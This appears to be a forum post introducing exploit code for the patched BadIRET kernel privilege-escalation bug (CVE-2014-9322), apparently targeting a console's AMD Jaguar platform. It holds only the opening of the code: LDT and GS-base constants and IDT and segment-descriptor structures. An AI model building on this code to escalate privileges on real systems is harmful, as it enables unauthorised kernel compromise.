https://labs.bromium.com/2015/02/02/exploiting-badiret-vulnerability-cve-2014-9322-linux-kernel-privilege-escalation/
- so for those who had heard of cturt's technical write up on the patched badiret vulnerability the link i have included in the top is a short refresher.
- again the short hand perequisites for triggering the vulnerability require you to be able map memory depending on your host platform and system specifics related to satisfying these conditions.
- in this case we are dealing with a "amd jaguar apu" so you can already kind of guess that mapping is obviously by the multiple of the page size set for your system.
- with that said seeing as badiret has already been patched. no one will probably care for this. but while it is good to never bite the hand that feeds you. its also good to be able 2 c what is in plain sight.
Code:
#include "threadshit.h"
#define printf(format, ...)\
do {\
char buffer[512];\
int size = sprintf(buffer, format, ##__VA_ARGS__);\
sceNetSend(sock, buffer, size, 0);\
} while(0)
#define CORE 6
#define FALSE_SS_BASE 0x10000UL
#define MAP_SIZE 0x10000
#define MAP_ANON 0x0002
#define I386_SET_LDT 1
#define LDT_AUTO_ALLOC 0xffffffff
#define SDT_MEMRWA 19
#define AMD64_GET_GSBASE 130
#define AMD64_SET_GSBASE 131
struct idt_ptr_struct
{
uint16_t limit; // Size of IDT table
uint64_t base; // Base address of IDT table
} __attribute__((packed));
struct idt_entry_struct
{
uint16_t target_offset_low;
uint16_t target_selector;
uint8_t ist_reserved_bits;
uint8_t access_bits;
uint16_t target_offset_mid;
uint32_t target_offset_high;
uint32_t reserved;
} __attribute__((packed));
typedef struct idt_entry_struct idt_entry_t;
typedef struct idt_ptr_struct idt_ptr_t;
struct user_segment_descriptor {
uint64_t sd_lolimit:16; /* segment extent (lsb) */
uint64_t sd_lobase:24; /* segment base address (lsb) */
uint64_t sd_type:5; /* segment type */
uint64_t sd_dpl:2; /* segment descriptor priority level */
uint64_t sd_p:1; /* segment descriptor present */
uint64_t sd_hilimit:4; /* segment extent (msb) */
uint64_t sd_xx:1; /* unused */
uint64_t sd_long:1; /* long mode (cs only) */
uint64_t sd_def32:1; /* default 32 vs 16 bit size */
uint64_t sd_gran:1; /* limit granularity (byte/page units)*/
uint64_t sd_hibase:8; /* segment base address (msb) */
} __attribute__((packed));